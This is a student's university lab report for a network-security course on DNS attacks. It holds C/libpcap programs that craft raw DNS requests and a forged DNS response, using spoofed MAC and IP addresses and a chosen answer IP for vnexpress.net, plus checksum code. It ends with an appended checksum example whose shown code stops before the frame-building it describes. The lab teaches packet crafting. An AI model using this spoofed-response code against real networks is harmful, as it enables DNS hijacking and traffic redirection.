NetworkSecurity MITM05016 DoNhuTai Lab2

Published on December 2016

INTERNATIONAL UNIVERSITY
School of Computer Science and Engineering

LAB 2: DNS attack (Part 1 + 2)

Course: Network Security
Date: 24/09/2013
Lecturer: Pham Van Hau, PhD
Duration: 180 minutes

Student name: DO NHU TAI

Student I! "IT"#$#%&

Introduction
To do the DNS Hijacking attack, you need to know how to generate and capture packets programmatically, and to understand the udp and dns packet headers as well as the dns protocol. The purpose of this lab is to give you hands-on experience in low level network programming. More precisely, you are going to create the dns request and response. These will help you a lot for the next lab :)

In general, to generate the raw packet you can use the pcap library (http://www.tcpdump.org/pcap.html), the Libnet library (http://packetfactory.openwall.net/projects/libnet/dist/deprecated/manual/lrm.html) or even the standard API (http://en.wikipedia.org/wiki/Berkeley_sockets). In the context of this lab, we use the pcap library. Several useful pieces of information can be found at http://www.tcpdump.org/pcap.html

To get an idea of what a dns packet looks like, on your linux machine:
• open wireshark to capture the traffic
• open a terminal and execute "nslookup vnexpress.net"

Try to look at the different fields of the captured dns packet and understand what they are used for. This link http://www.networksorcery.com/enp/protocol/dns.htm is also a great source for this purpose.

Part I: DNS packet generation
To help you with the programming, I have created two programs, called dns_request_gen.c and dns_response_gen.c. The programs I sent to you are not complete. You need to modify them in several places (marked as "TO BE MODIFIED").

I. DNS packet request
Modify dns_request_gen.c to generate the dns request that has the
• source MAC: A1 A2 A3 A4 A5 A6
• destination MAC: B1 B2 B3 B4 B5 B6
• source port: 4000
• destination port: 53
• Transaction ID: AABB
• source IP address: 1.2.3.4
• destination IP address: 6.7.8.9
• dns query to ask the IP address of "vnexpress.net"

Answer: Dntai_dns_request_v1.c (without ip, udp checksum)
#include <stdio.h>         //printf
#include <string.h>        //strlen
#include <strings.h>       //bcopy
#include <stdlib.h>        //malloc
#include <sys/socket.h>    //you know what this is for
#include <arpa/inet.h>     //inet_addr , inet_ntoa , ntohs etc
#include <netinet/in.h>
#include <unistd.h>        //getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14
/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6
/* UDP PROTOCOL */
#define UDP_PROL 17

struct dns_query {
    u_short q_type;                 /* type of the host */
    u_short q_class;                /* class */
};

struct ethernet_header {
    u_char  ether_dhost[ETHER_ADDR_LEN];   /* destination host address */
    u_char  ether_shost[ETHER_ADDR_LEN];   /* source host address */
    u_short ether_type;                    /* IP? ARP? RARP? etc */
};

/* IP header */
struct ip_header {
    u_char  ip_vhl;                 /* version << 4 | header length >> 2 */
    u_char  ip_tos;                 /* type of service */
    u_short ip_len;                 /* total length */
    u_short ip_id;                  /* identification */
    u_short ip_off;                 /* fragment offset field */
#define IP_RF 0x8000                /* reserved fragment flag */
#define IP_DF 0x4000                /* dont fragment flag */
#define IP_MF 0x2000                /* more fragments flag */
#define IP_OFFMASK 0x1fff           /* mask for fragmenting bits */
    u_char  ip_ttl;                 /* time to live */
    u_char  ip_p;                   /* protocol */
    u_short ip_sum;                 /* checksum */
    struct in_addr ip_src, ip_dst;  /* source and destination address */
};
#define IP_HL(ip)  (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)   (((ip)->ip_vhl) >> 4)

struct udp_header {
    u_short udp_sport;              /* source port */
    u_short udp_dport;              /* destination port */
    u_short udp_len;                /* udp length */
    u_short udp_sum;                /* udp checksum */
};

struct dns_header {
    u_short id;                     /* transaction ID */
    u_short flags;                  /* flags */
    u_short q_count;                /* number of question entries */
    u_short ans_count;              /* number of answer entries */
    u_short auth_count;             /* number of authority entries */
    u_short add_count;              /* number of resource entries */
};

/* functions */
void print_app_info(void){
    printf("Dns request version 1 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "vnexpress.net" into the DNS label format: 9vnexpress3net0 */
void DNS_name_converter(char *host, char *dns)
{
    int len = strlen(host);
    dns[len+2] = 0;
    int count = 0;                  // For counting the number of characters until a 'dot' is met
    while (len > 0) {               // While host name length is larger than zero
        if (host[len-1] == '.') {   // Count from the last character of the host name; if there is a 'dot'
            dns[len] = count;       // store the counted number into the dns name buffer
            count = 0;              // and set count to zero to recount
        } else {
            dns[len] = host[len-1]; // If the character is not a 'dot', store it into the dns name buffer
            count++;                // Increase count
        }
        len--;                      // Decrease len
    }
    dns[0] = count;                 // When the last character is reached, store the final count into the dns name buffer
}

int main(int argc, char *argv[])
{
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;                     // host name to look up ip. Ex: vnexpress.net
    char *dev;                      // network device to capture. Ex: eth0
    u_char packet[5000];            // packet is the buffer that contains the data

    print_app_info();
    if (argc != 3) {
        printf("Usage: %s <Network Device's Name> <Hostname ex: www.vnexpress.net> \n", argv[0]);
        exit(1);
    } else {
        dev = argv[1];
        host = argv[2];
    }
    // checking for a suitable network device and storing the ip, subnet mask for future use
    if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL) {
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet ([Ethernet] + [IP] + [TCP/UDP] + [Application])
    memset(packet, 0, 4096);        // packet is the buffer that holds the data

    /* ********************* Build a [DNS REQUEST] packet *********************
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header *ip;           // pointer to the start of the ip header
    struct udp_header *udp;         // pointer to the start of the udp header
    struct dns_header *dns;         // pointer to the start of the dns header
    u_char *q_name;                 // pointer to the start of the query_name
    int host_len = strlen(host);    // (vnexpress.net has len=13) the query name length is the number of characters of the host name
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    int size_q_name = host_len + 2; // size of the query name: host name plus the leading length byte and the terminator (2)

    /* ***************** Point each header pointer at its region of the packet ***************** */
    eth = (struct ethernet_header *)(packet);
    /****************************TO BE MODIFIED 1 ***************************/
    ip = (struct ip_header *)(packet + SIZE_ETH);
    /****************************TO BE MODIFIED 2 ***************************/
    udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
    /****************************TO BE MODIFIED 3 ***************************/
    dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));
    // Query Name Pointer
    q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
    // Dns Query Pointer
    dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);

    /* Ethernet Header */
    bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", &eth->ether_shost, 6);    // Source MAC Address
    /****************************TO BE MODIFIED 4 ***************************/
    bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", &eth->ether_dhost, 6);    // Destination MAC Address
    bcopy("\x08\x00", (char *)&eth->ether_type, 2);             // Type IP (0x0800)

    /* IP Header */
    ip->ip_vhl = 0x45;              // IP version 4 & length = 5 words (20 bytes)
    ip->ip_tos = 0x00;              // Differentiated Services Field
    ip->ip_id = htons(0xf1a4);      // Identification
    ip->ip_off = 0;
    ip->ip_ttl = 64;                // time to live
    ip->ip_p = UDP_PROL;            // UDP protocol
    ip->ip_sum = 0;                 // ip checksum (??)
    (ip->ip_src).s_addr = inet_addr("1.2.3.4");     // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("6.7.8.9");     // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(4000);   // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(53);     // destination port
    udp->udp_sum = 0;               // udp checksum (??)

    /* DNS Header */
    dns->id = htons(0xAABB);        // transaction ID
    dns->flags = htons(0x0100);     // flags (standard query)
    dns->q_count = htons(0x001);    // number of question
    dns->ans_count = 0;             // number of answer
    dns->auth_count = 0;            // number of authority
    dns->add_count = 0;             // number of resource

    /* DNS Query: query_name, dns query header */
    // Convert hostname to dns format and store it in the memory q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type = htons(1);      // type of the host
    dns_qr->q_class = htons(1);     // class

    /* Update Length of Ip Header and Udp Header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));
    // total length: add in host order and convert once (adding two htons() values only works while there is no carry between bytes)
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));
    size_ip = IP_HL(ip) * 4;

    /* send packet 6 times */
    for (i = 0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    }
    return 0;
}

Result with capturing packet:
- Receive 6 dns request packets
- Ethernet Header
- IP Header (with checksum error)
- UDP Header
- Dns Query

II. DNS packet response
Modify dns_response_gen.c to generate the dns response that has the
• source MAC: B1 B2 B3 B4 B5 B6
• destination MAC: A1 A2 A3 A4 A5 A6
• source port: 53
• destination port: 4000
• Transaction ID: AABB
• source IP address: 6.7.8.9
• destination IP address: 1.2.3.4
• dns response: the ip address of "vnexpress.net" is "111.65.248.132"

Answer: Dntai_dns_response_v1.c (without ip, udp checksum)
#include <stdio.h>         //printf
#include <string.h>        //strlen
#include <strings.h>       //bcopy
#include <stdlib.h>        //malloc
#include <sys/socket.h>    //you know what this is for
#include <arpa/inet.h>     //inet_addr , inet_ntoa , ntohs etc
#include <netinet/in.h>
#include <unistd.h>        //getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14
/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6
/* UDP PROTOCOL */
#define UDP_PROL 17

/* One A record with a compressed name; laid out to match the 16-byte wire format */
struct dns_answer {
    u_short a_name;                 /* answer host name */
    u_short a_type;                 /* answer host type */
    u_short a_class;                /* answer host class */
    u_char  a_ttl[4];               /* time to live, costs 4 bytes */
    u_short a_len;                  /* length */
    struct in_addr a_addr;          /* address of host */
};

struct dns_query {
    u_short q_type;                 /* type of the host */
    u_short q_class;                /* class */
};

struct ethernet_header {
    u_char  ether_dhost[ETHER_ADDR_LEN];   /* destination host address */
    u_char  ether_shost[ETHER_ADDR_LEN];   /* source host address */
    u_short ether_type;                    /* IP? ARP? RARP? etc */
};

/* IP header */
struct ip_header {
    u_char  ip_vhl;                 /* version << 4 | header length >> 2 */
    u_char  ip_tos;                 /* type of service */
    u_short ip_len;                 /* total length */
    u_short ip_id;                  /* identification */
    u_short ip_off;                 /* fragment offset field */
#define IP_RF 0x8000                /* reserved fragment flag */
#define IP_DF 0x4000                /* dont fragment flag */
#define IP_MF 0x2000                /* more fragments flag */
#define IP_OFFMASK 0x1fff           /* mask for fragmenting bits */
    u_char  ip_ttl;                 /* time to live */
    u_char  ip_p;                   /* protocol */
    u_short ip_sum;                 /* checksum */
    struct in_addr ip_src, ip_dst;  /* source and destination address */
};
#define IP_HL(ip)  (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)   (((ip)->ip_vhl) >> 4)

struct udp_header {
    u_short udp_sport;              /* source port */
    u_short udp_dport;              /* destination port */
    u_short udp_len;                /* udp length */
    u_short udp_sum;                /* udp checksum */
};

struct dns_header {
    u_short id;                     /* transaction ID */
    u_short flags;                  /* flags */
    u_short q_count;                /* number of question entries */
    u_short ans_count;              /* number of answer entries */
    u_short auth_count;             /* number of authority entries */
    u_short add_count;              /* number of resource entries */
};

/* functions */
void print_app_info(void)
{
    printf("Dns response version 1 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "vnexpress.net" into the DNS label format: 9vnexpress3net0 */
void DNS_name_converter(char *host, char *dns)
{
    int len = strlen(host);
    dns[len+2] = 0;
    int count = 0;                  // For counting the number of characters until a 'dot' is met
    while (len > 0) {               // While host name length is larger than zero
        if (host[len-1] == '.') {   // Count from the last character of the host name; if there is a 'dot'
            dns[len] = count;       // store the counted number into the dns name buffer
            count = 0;              // and set count to zero to recount
        } else {
            dns[len] = host[len-1]; // If the character is not a 'dot', store it into the dns name buffer
            count++;                // Increase count
        }
        len--;                      // Decrease len
    }
    dns[0] = count;                 // When the last character is reached, store the final count into the dns name buffer
}

int main(int argc, char *argv[])
{
    u_char packet[5000];
    char *dev;                      // network device
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;

    print_app_info();
    if (argc != 3) {
        printf("Usage: %s <Network Device's Name> <Hostname ex: www.vnexpress.net> \n", argv[0]);
        exit(1);
    } else {
        dev = argv[1];
        host = argv[2];
    }
    // checking for a suitable network device and storing the ip, subnet mask for future use
    if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL) {
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet
    memset(packet, 0, 4096);

    /* ********************* Build a [DNS RESPONSE] packet *********************
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query + Dns Answer */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header *ip;           // pointer to the start of the ip header
    struct udp_header *udp;         // pointer to the start of the udp header
    struct dns_header *dns;         // pointer to the start of the dns header
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    struct dns_answer *dns_as;      // pointer to the start of the dns answer
    u_char *q_name;                 // Dns name in query
    int host_len = strlen(host);    // Hostname length
    int size_q_name = host_len + 2; // size of the query name: host name plus the leading length byte and the terminator (2)

    /* ***************** Point each header pointer at its region of the packet ***************** */
    eth = (struct ethernet_header *)(packet);
    /****************************TO BE MODIFIED 1 ***************************/
    ip = (struct ip_header *)(packet + SIZE_ETH);
    /****************************TO BE MODIFIED 2 ***************************/
    udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
    /****************************TO BE MODIFIED 3 ***************************/
    dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));
    // Query name Pointer
    q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
    // Dns Query Pointer
    dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);
    // Dns Answer Pointer
    dns_as = (struct dns_answer *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));

    /* Ethernet Header */
    bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", &eth->ether_shost, 6);    // Source MAC Address
    /****************************TO BE MODIFIED 4 ***************************/
    bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", &eth->ether_dhost, 6);    // Destination MAC Address
    bcopy("\x08\x00", (char *)&eth->ether_type, 2);             // Type IP (0x0800)

    /* IP Header */
    ip->ip_vhl = 0x45;              // IP version 4 & length = 5 words (20 bytes)
    ip->ip_tos = 0x00;              // Differentiated Services Field
    ip->ip_id = htons(0xf1a4);      // Identification
    ip->ip_off = 0;
    ip->ip_ttl = 64;                // time to live
    ip->ip_p = UDP_PROL;            // UDP protocol
    ip->ip_sum = 0;                 // ip checksum (??)
    (ip->ip_src).s_addr = inet_addr("6.7.8.9");     // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("1.2.3.4");     // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(53);     // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(4000);   // destination port
    udp->udp_sum = 0;               // udp checksum (??)

    /* DNS Header */
    dns->id = htons(0xAABB);        // transaction ID
    dns->flags = htons(0x8180);     // flags (standard query response, no error)
    dns->q_count = htons(0x001);    // number of question
    dns->ans_count = htons(0x001);  // number of answer
    dns->auth_count = 0;            // number of authority
    dns->add_count = 0;             // number of resource

    /* DNS Query: query_name, dns query header, dns query answer */
    // Convert hostname to dns format and store it in the memory q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type = htons(1);      // type of the host
    dns_qr->q_class = htons(1);     // class

    /* DNS Answer */
    bcopy("\xc0\x0c", &dns_as->a_name, 2);          // compressed name: pointer to offset 12, the question name
    dns_as->a_type = htons(1);      // type of the host
    dns_as->a_class = htons(1);     // class
    bcopy("\x00\x00\x01\xc3", &dns_as->a_ttl, 4);   // time to live (0x1c3 = 451 seconds)
    dns_as->a_len = htons(4);       // length of an IPv4 address
    /****************************TO BE MODIFIED 7 ***************************/
    dns_as->a_addr.s_addr = inet_addr("111.65.248.132");

    /* Update Length of Ip Header and Udp Header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query) + sizeof(struct dns_answer));
    // total length: add in host order and convert once (adding two htons() values only works while there is no carry between bytes)
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));
    size_ip = IP_HL(ip) * 4;

    /* send packet 6 times */
    for (i = 0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    }
    return 0;
}

Result with capturing packet:
- Receive 6 dns response packets

III. DNS packet response
The checksums (of the ip and udp headers) of the generated packets are wrong. Do what is necessary to make them right.

Answer: Dntai_dns_request_v2.c (with ip, udp checksum)
#include <stdio.h>         //printf
#include <string.h>        //strlen
#include <strings.h>       //bcopy
#include <stdlib.h>        //malloc
#include <sys/socket.h>    //you know what this is for
#include <arpa/inet.h>     //inet_addr , inet_ntoa , ntohs etc
#include <netinet/in.h>
#include <unistd.h>        //getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14
/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6
/* UDP PROTOCOL */
#define UDP_PROL 17

struct dns_query {
    u_short q_type;                 /* type of the host */
    u_short q_class;                /* class */
};

struct ethernet_header {
    u_char  ether_dhost[ETHER_ADDR_LEN];   /* destination host address */
    u_char  ether_shost[ETHER_ADDR_LEN];   /* source host address */
    u_short ether_type;                    /* IP? ARP? RARP? etc */
};

/* IP header */
struct ip_header {
    u_char  ip_vhl;                 /* version << 4 | header length >> 2 */
    u_char  ip_tos;                 /* type of service */
    u_short ip_len;                 /* total length */
    u_short ip_id;                  /* identification */
    u_short ip_off;                 /* fragment offset field */
#define IP_RF 0x8000                /* reserved fragment flag */
#define IP_DF 0x4000                /* dont fragment flag */
#define IP_MF 0x2000                /* more fragments flag */
#define IP_OFFMASK 0x1fff           /* mask for fragmenting bits */
    u_char  ip_ttl;                 /* time to live */
    u_char  ip_p;                   /* protocol */
    u_short ip_sum;                 /* checksum */
    struct in_addr ip_src, ip_dst;  /* source and destination address */
};
#define IP_HL(ip)  (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)   (((ip)->ip_vhl) >> 4)

struct udp_header {
    u_short udp_sport;              /* source port */
    u_short udp_dport;              /* destination port */
    u_short udp_len;                /* udp length */
    u_short udp_sum;                /* udp checksum */
};

struct dns_header {
    u_short id;                     /* transaction ID */
    u_short flags;                  /* flags */
    u_short q_count;                /* number of question entries */
    u_short ans_count;              /* number of answer entries */
    u_short auth_count;             /* number of authority entries */
    u_short add_count;              /* number of resource entries */
};

/* functions */
void print_app_info(void){
    printf("Dns request version 2 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "vnexpress.net" into the DNS label format: 9vnexpress3net0 */
void DNS_name_converter(char *host, char *dns)
{
    int len = strlen(host);
    dns[len+2] = 0;
    int count = 0;                  // For counting the number of characters until a 'dot' is met
    while (len > 0) {               // While host name length is larger than zero
        if (host[len-1] == '.') {   // Count from the last character of the host name; if there is a 'dot'
            dns[len] = count;       // store the counted number into the dns name buffer
            count = 0;              // and set count to zero to recount
        } else {
            dns[len] = host[len-1]; // If the character is not a 'dot', store it into the dns name buffer
            count++;                // Increase count
        }
        len--;                      // Decrease len
    }
    dns[0] = count;                 // When the last character is reached, store the final count into the dns name buffer
}

/* ************ FUNCTIONS THAT CREATE THE CHECKSUM OF UDP, IP ************ */
unsigned short csum(unsigned short *buf, int nwords);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

/* IP header checksum: one's complement sum of the header words as they sit in
   memory (network byte order), so the result is stored without htons().
   nwords is really the header length in bytes; it is halved below. */
unsigned short csum(unsigned short *buf, int nwords)
{
    unsigned long sum = 0;
    int i;
    for (i = 0; i < (nwords/2); i++)
        sum += buf[i];
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

/* UDP checksum: sums the pseudo header and the whole UDP datagram in host
   byte order, so the caller stores it with htons(). */
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[])
{
    unsigned short udp_protocol = UDP_PROL;
    unsigned short padding = 0;
    unsigned long sum;
    int i;
    // Find out if the length of the data is even or odd. If odd, add a padding byte = 0 at the end of the packet
    if (len % 2 != 0) {
        padding = 1;
        ((unsigned char *)buff)[len] = 0;   // pad the byte at offset len (indexing buff[len] would zero the wrong word)
    }
    // Initialize sum to zero
    sum = 0;
    // Sum the whole buffer in 16 bit words
    for (i = 0; i < (len + padding)/2; i++)
        sum += ntohs((unsigned short) buff[i]);
    // Sum the pseudo header which contains source ip, destination ip, protocol number and length
    for (i = 0; i < 2; i++)
        sum += ntohs((unsigned short) ip_src[i]);
    for (i = 0; i < 2; i++)
        sum += ntohs((unsigned short) ip_dst[i]);
    sum += (unsigned short)udp_protocol + (unsigned short)len;
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return ~sum;
}

int main(int argc, char *argv[])
{
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;                     // host name to look up ip. Ex: vnexpress.net
    char *dev;                      // network device to capture. Ex: eth0
    u_char packet[5000];            // packet is the buffer that contains the data

    print_app_info();
    if (argc != 3) {
        printf("Usage: %s <Network Device's Name> <Hostname ex: www.vnexpress.net> \n", argv[0]);
        exit(1);
    } else {
        dev = argv[1];
        host = argv[2];
    }
    // checking for a suitable network device and storing the ip, subnet mask for future use
    if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL) {
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet ([Ethernet] + [IP] + [TCP/UDP] + [Application])
    memset(packet, 0, 4096);        // packet is the buffer that holds the data

    /* ********************* Build a [DNS REQUEST] packet *********************
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header *ip;           // pointer to the start of the ip header
    struct udp_header *udp;         // pointer to the start of the udp header
    struct dns_header *dns;         // pointer to the start of the dns header
    u_char *q_name;                 // pointer to the start of the query_name
    int host_len = strlen(host);    // (vnexpress.net has len=13) the query name length is the number of characters of the host name
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    int size_q_name = host_len + 2; // size of the query name: host name plus the leading length byte and the terminator (2)

    /* ***************** Point each header pointer at its region of the packet ***************** */
    eth = (struct ethernet_header *)(packet);
    /****************************TO BE MODIFIED 1 ***************************/
    ip = (struct ip_header *)(packet + SIZE_ETH);
    /****************************TO BE MODIFIED 2 ***************************/
    udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
    /****************************TO BE MODIFIED 3 ***************************/
    dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));
    // Query Name Pointer
    q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
    // Dns Query Pointer
    dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);

    /* Ethernet Header */
    bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", &eth->ether_shost, 6);    // Source MAC Address
    /****************************TO BE MODIFIED 4 ***************************/
    bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", &eth->ether_dhost, 6);    // Destination MAC Address
    bcopy("\x08\x00", (char *)&eth->ether_type, 2);             // Type IP (0x0800)

    /* IP Header */
    ip->ip_vhl = 0x45;              // IP version 4 & length = 5 words (20 bytes)
    ip->ip_tos = 0x00;              // Differentiated Services Field
    ip->ip_id = htons(0xf1a4);      // Identification
    ip->ip_off = 0;
    ip->ip_ttl = 64;                // time to live
    ip->ip_p = UDP_PROL;            // UDP protocol
    ip->ip_sum = 0;                 // ip checksum (??)
    (ip->ip_src).s_addr = inet_addr("1.2.3.4");     // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("6.7.8.9");     // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(4000);   // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(53);     // destination port
    udp->udp_sum = 0;               // udp checksum (??)

    /* DNS Header */
    dns->id = htons(0xAABB);        // transaction ID
    dns->flags = htons(0x0100);     // flags (standard query)
    dns->q_count = htons(0x001);    // number of question
    dns->ans_count = 0;             // number of answer
    dns->auth_count = 0;            // number of authority
    dns->add_count = 0;             // number of resource

    /* DNS Query: query_name, dns query header */
    // Convert hostname to dns format and store it in the memory q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type = htons(1);      // type of the host
    dns_qr->q_class = htons(1);     // class

    /* Update Length of Ip Header and Udp Header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));
    // total length: add in host order and convert once (adding two htons() values only works while there is no carry between bytes)
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));
    size_ip = IP_HL(ip) * 4;

    /* UPDATE CHECKSUM OF IP HEADER AND UDP HEADER (both fields must be zero while the sum is computed) */
    ip->ip_sum = 0;
    ip->ip_sum = (csum((unsigned short *)(packet + SIZE_ETH), size_ip));
    udp->udp_sum = 0;
    udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&(ip->ip_src), (u_short *)&(ip->ip_dst), (unsigned short *)udp));

    /* send packet 6 times */
    for (i = 0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if (result == 0)
            printf("[Packet sent successfully]\n");
        else
            printf("[Packet sent failure]\n");
    }
    return 0;
}

Result with capturing packet:
- Receive 6 dns request packets
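As an added example (not part of the lab handout or the student's answer above), the following stand-alone C program encodes the query name the way DNS_name_converter does, builds the same request frame as Part I as raw bytes (1.2.3.4:4000 to 6.7.8.9:53, ID 0xAABB, A query for vnexpress.net), and computes and then verifies the IP and UDP checksums that Part III asks for, including the odd-length padding byte and the rule that a computed UDP checksum of 0 is transmitted as 0xFFFF. It works purely in memory and sends nothing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_LEN 14      /* Ethernet header */
#define IP_LEN 20       /* IPv4 header without options */
#define UDP_LEN 8       /* UDP header */
#define DNS_HDR_LEN 12  /* DNS header */

/* Encode "vnexpress.net" as \x09vnexpress\x03net\x00 (labels <= 63 bytes and
 * a name <= 255 bytes are assumed). Returns the encoded length, host_len + 2. */
size_t dns_encode_name(const char *host, uint8_t *out)
{
    size_t pos = 0, start = 0, i;
    for (i = 0;; i++) {
        if (host[i] == '.' || host[i] == '\0') {
            out[pos++] = (uint8_t)(i - start);          /* label length */
            memcpy(out + pos, host + start, i - start);
            pos += i - start;
            start = i + 1;
            if (host[i] == '\0') break;
        }
    }
    out[pos++] = 0;                                      /* root label */
    return pos;
}

/* One's-complement sum of big-endian 16-bit words. An odd trailing byte is
 * padded with a zero low byte, as RFC 768 requires for UDP. */
static uint32_t ones_sum(const uint8_t *buf, size_t len, uint32_t sum)
{
    while (len > 1) {
        sum += ((uint32_t)buf[0] << 8) | buf[1];
        buf += 2;
        len -= 2;
    }
    if (len)
        sum += (uint32_t)buf[0] << 8;
    return sum;
}

/* Fold the carries back in (end-around carry) and complement. */
static uint16_t fold(uint32_t sum)
{
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

/* IPv4 header checksum; the checksum field must be zero when called. */
uint16_t ip_checksum(const uint8_t *ip, size_t hl)
{
    return fold(ones_sum(ip, hl, 0));
}

/* UDP checksum over the pseudo-header (src, dst, zero, protocol 17, UDP
 * length) and the whole datagram; a computed 0 is transmitted as 0xFFFF. */
uint16_t udp_checksum(const uint8_t *ip, const uint8_t *udp, size_t udplen)
{
    uint32_t sum = ones_sum(ip + 12, 8, 0);              /* src + dst address */
    sum += 17 + (uint32_t)udplen;
    sum = ones_sum(udp, udplen, sum);
    uint16_t c = fold(sum);
    return c ? c : 0xFFFF;
}

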